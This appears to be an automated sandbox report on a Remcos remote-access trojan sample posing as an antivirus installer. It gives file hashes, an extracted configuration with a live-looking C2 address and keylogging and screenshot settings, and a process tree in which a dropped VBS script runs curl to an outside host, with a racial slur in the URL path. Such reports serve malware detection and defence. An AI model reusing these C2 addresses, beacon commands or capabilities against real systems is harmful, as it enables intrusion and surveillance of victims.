Analysis

  • max time kernel
    141s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-04-2024 11:57

General

  • Target
    och_antivirus.exe
  • Size
    17.0MB
  • MD5
    41d3613c3bd70904c8ed605bed978987
  • SHA1
    8a44183362dc9dd222cb92b0e0a33b7eb3bc2c34
  • SHA256
    69b943efb0b8f871b591ce1994bae3e550701a209f79c4d31e2451a69771b166
  • SHA512
    bb80f240d675a3c8b0b756f9609bd146faa77bd1c4f23dd0a63825405166908af8aff621e2510e5f67a41e4ea181201ae50a000a3b5bc5ef68dd4806532172b1
  • SSDEEP
    196608:H0bq45mXYPrOLaw1alaHwSiLPpizFNwR3LZBh51ZC1uBaPENjZZ:Ubq4oojOLahLhr9dDZwujL

Malware Config

Extracted

  • Family
    remcos
  • Botnet
    RemoteHost
  • C2
    178.33.57.155:443

Attributes
  • audio_folder
    MicRecords
  • audio_record_time
    5
  • connect_delay
    0
  • connect_interval
    1
  • copy_file
    remcos.exe
  • copy_folder
    Remcos
  • delete_file
    false
  • hide_file
    false
  • hide_keylog_file
    false
  • install_flag
    false
  • keylog_crypt
    false
  • keylog_file
    logs.dat
  • keylog_flag
    false
  • keylog_folder
    remcos
  • mouse_option
    false
  • mutex
    Rmc-PM1AI7
  • screenshot_crypt
    false
  • screenshot_flag
    false
  • screenshot_folder
    Screenshots
  • screenshot_path
    %AppData%
  • screenshot_time
    10
  • take_screenshot_option
    false
  • take_screenshot_time
    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 13 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe
    "C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe"
    1⤵
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
      C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
        C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Drops file in System32 directory
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4792
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\SysWOW64\curl.exe
                  curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
                  8⤵
                    PID:3852
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs"
                6⤵
                  PID:1900

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\6aaf70f6

        Filesize

        5.4MB

        MD5

        045bb8ad2f52ecd9dd9a98c091a8104e

        SHA1

        5047bf498dad1537f2308cc03e090a6b43f64ccd

        SHA256

        ad0710db7f86bf4c43b98437ef1da37ac0f246658e6bb426bc6e4cb7a813ccd0

        SHA512

        ec0df109f03508c6662f32bab28a2d6c58d052f3303bb3b521d6b993453320fffd64194d60340354e299a850bfed87ea8588a4f2f495c7908948309528b4bde2

      • C:\Users\Admin\AppData\Local\Temp\7746d2f6

        Filesize

        1.2MB

        MD5

        ec23407f1e09987b36550d5b2ebff6d9

        SHA1

        c462cdf2a3fe50e2bedae7c8b92b4961dbb1276a

        SHA256

        3ecb2ee304aebc28894984a1704a16d80efdf0b15810272179115b58078faf3c

        SHA512

        883fdd28a47053218b045755e3d1c1dc3334cf7f4a9735f00df2f6d9211816165779ec96ec63137746abc7cc39f4dbf2c03f6b8a5c0c5d8c642f6ef2690de473

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs

        Filesize

        324B

        MD5

        5969db124f530f24b0e1b305ca5a8291

        SHA1

        5eb79a70cc356a20ba39913489a5cdca36f83011

        SHA256

        3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072

        SHA512

        0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\MSVCP140.dll

        Filesize

        427KB

        MD5

        71a0aa2d05e9174cefd568347bd9c70f

        SHA1

        cb9247a0fa59e47f72df7d1752424b33a903bbb2

        SHA256

        fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47

        SHA512

        6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\VCRUNTIME140.dll

        Filesize

        81KB

        MD5

        16b26bc43943531d7d7e379632ed4e63

        SHA1

        565287de39649e59e653a3612478c2186096d70a

        SHA256

        346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517

        SHA512

        b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\WCLDll.dll

        Filesize

        590KB

        MD5

        b3e030ab715a02f8864a79f552a247b7

        SHA1

        4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa

        SHA256

        2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955

        SHA512

        cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\audiovisual.psd

        Filesize

        1.0MB

        MD5

        c08c443520df3d30875ddc0e718f3346

        SHA1

        ff9ac03414433f597f58dce45dca0eb16d522964

        SHA256

        a22a7cecd7605ba16418b32079fe856ce4dc923b894986a472963aeb0fc0c6e1

        SHA512

        bf60ba1ee45f4f55851eb946d34bcd992379245e2ac7bd6da5e5c2bfc296b25ae88918d50d941710121028bfb8f9e32797ba6c885524bcc37426898b2ada1858

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\cyclopedia.html

        Filesize

        28KB

        MD5

        db3f3969e8a2f913fe3643d8465171b1

        SHA1

        736095ea1e02547a6df2586fffdbf31bb7d23656

        SHA256

        c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043

        SHA512

        0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptMgr.dll

        Filesize

        2.5MB

        MD5

        2087eb2d3fb639933ebe0a0614fd5218

        SHA1

        c1a1b75c8e76e000b7045092bd11100904a72840

        SHA256

        725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f

        SHA512

        3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe

        Filesize

        202KB

        MD5

        64179e64675e822559cac6652298bdfc

        SHA1

        cceed3b2441146762512918af7bf7f89fb055583

        SHA256

        c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9

        SHA512

        ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptusredt.dll

        Filesize

        165KB

        MD5

        3c3e960d59cb413791fee1e944b6df72

        SHA1

        4aa6c90d81692642ca8266bf0d8e249ff3e3ad54

        SHA256

        88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67

        SHA512

        85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\wbxtrace.dll

        Filesize

        103KB

        MD5

        c2b06a78b6c07a1371b6aed1dbf4fc37

        SHA1

        b8847693e7cd3637b1b400e71430cdf629de2e64

        SHA256

        9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04

        SHA512

        219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411
